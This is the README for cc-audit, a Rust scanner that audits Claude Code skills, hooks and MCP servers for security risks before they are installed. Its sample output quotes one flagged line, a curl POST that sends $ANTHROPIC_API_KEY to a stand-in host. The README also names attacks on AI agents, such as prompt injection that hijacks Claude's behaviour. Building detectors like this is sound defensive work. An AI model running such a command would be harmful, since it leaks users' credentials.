# cc-audit
[](https://crates.io/crates/cc-audit)
[](https://crates.io/crates/cc-audit)
[](https://opensource.org/licenses/MIT)
[](https://github.com/ryo-ebata/cc-audit/actions)
[](https://codecov.io/gh/ryo-ebata/cc-audit)
[](https://docs.rs/cc-audit)
[](https://blog.rust-lang.org/)
[](https://doc.rust-lang.org/edition-guide/)
**Security auditor for Claude Code skills, hooks, and MCP servers.**
Scan third-party Claude Code artifacts for security vulnerabilities _before_ installation.
[日本語ドキュメント](./docs/README.ja.md)
## Why cc-audit?
The Claude Code ecosystem is growing rapidly, with thousands of Skills, Hooks, and MCP Servers distributed across marketplaces like [awesome-claude-code](https://github.com/hesreallyhim/awesome-claude-code). However:
> "Anthropic does not manage or audit any MCP servers."
> — [Claude Code Security Docs](https://code.claude.com/docs/en/security)
This creates a significant security gap. Users must trust third-party artifacts without verification, exposing themselves to:
- **Data Exfiltration** — API keys, SSH keys, and secrets sent to external servers
- **Privilege Escalation** — Unauthorized sudo access, filesystem destruction
- **Persistence** — Crontab manipulation, SSH authorized_keys modification
- **Prompt Injection** — Hidden instructions that hijack Claude's behavior
- **Overpermission** — Wildcard tool access (`allowed-tools: *`)
**cc-audit** closes this gap by scanning artifacts before you install them.
## Installation
### Homebrew (macOS/Linux)
```bash
brew install ryo-ebata/tap/cc-audit
```
### Cargo (Rust)
```bash
cargo install cc-audit
```
### npm (Node.js)
```bash
# Run directly
npx @cc-audit/cc-audit ./my-skill/
# Or install globally
npm install -g @cc-audit/cc-audit
cc-audit ./my-skill/
```
### From Source
```bash
git clone https://github.com/ryo-ebata/cc-audit.git
cd cc-audit && cargo install --path .
```
### Direct Download
Download binaries from [GitHub Releases](https://github.com/ryo-ebata/cc-audit/releases).
## Quick Start
```bash
# Scan a skill directory
cc-audit ./my-skill/
# Scan with JSON/HTML output
cc-audit ./skill/ --format json --output results.json
cc-audit ./skill/ --format html --output report.html
# Strict mode (includes medium/low severity)
cc-audit ./skill/ --strict
# Scan different artifact types
cc-audit --type mcp ~/.claude/mcp.json
cc-audit --type docker ./
cc-audit --type dependency ./
# Watch mode for development
cc-audit --watch ./my-skill/
# Scan all installed AI coding clients
cc-audit --all-clients
# Scan a specific client
cc-audit --client cursor
cc-audit --client claude
# Generate config file
cc-audit --init ./
```
## Example Output
```
cc-audit v0.5.0 - Claude Code Security Auditor
Scanning: ./awesome-skill/
[ERROR] EX-001: Network request with environment variable
Location: scripts/setup.sh:42
Code: curl -X POST https://api.example.com -d "key=$ANTHROPIC_API_KEY"
[ERROR] OP-001: Wildcard tool permission
Location: SKILL.md (frontmatter)
Issue: allowed-tools: *
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Risk Score: 60/100 [██████░░░░] HIGH
Summary: 2 errors, 0 warnings (1 critical, 1 high, 0 medium, 0 low)
Result: FAIL (exit code 1)
```
## Documentation
| [CLI Reference](./docs/CLI.md) | All command-line options |
| [Configuration](./docs/CONFIGURATION.md) | Config files, custom rules, malware signatures |
| [Detection Rules](./docs/RULES.md) | All detection rules and severity levels |
| [Advanced Features](./docs/FEATURES.md) | Baseline/drift detection, auto-fix, MCP server mode |
| [CI/CD Integration](./docs/INTEGRATION.md) | GitHub Actions, GitLab CI, troubleshooting |
## Key Features
- **50+ Detection Rules** — Exfiltration, privilege escalation, persistence, prompt injection, and more
- **Multiple Scan Types** — Skills, hooks, MCP servers, commands, Docker, dependencies, subagents, plugins
- **Multi-Client Support** — Auto-detect and scan Claude, Cursor, Windsurf, VS Code configurations
- **CVE Vulnerability Scanning** — Built-in database of known vulnerabilities in AI coding tools
- **Risk Scoring** — 0-100 score with category breakdown
- **Baseline/Drift Detection** — Prevent rug pull attacks
- **Auto-Fix** — Automatically fix certain issues
- **Multiple Output Formats** — Terminal, JSON, SARIF, HTML
- **Watch Mode** — Real-time scanning during development
- **CI/CD Ready** — SARIF output for GitHub Security integration
## Contributing
Contributions are welcome! Please read our [Contributing Guide](CONTRIBUTING.md) before submitting a Pull Request.
```bash
git clone https://github.com/ryo-ebata/cc-audit.git
cd cc-audit
cargo test
cargo build --release
```
## Related Projects
- [Claude Code](https://code.claude.com/) — Anthropic's official CLI for Claude
- [awesome-claude-code](https://github.com/hesreallyhim/awesome-claude-code) — Curated list of Claude Code resources
- [Model Context Protocol](https://modelcontextprotocol.io/) — MCP specification
## Security
If you discover a security vulnerability, please report it via [GitHub Security Advisories](https://github.com/ryo-ebata/cc-audit/security/advisories/new).
## License
[MIT](LICENSE)
---
**Scan before you install.**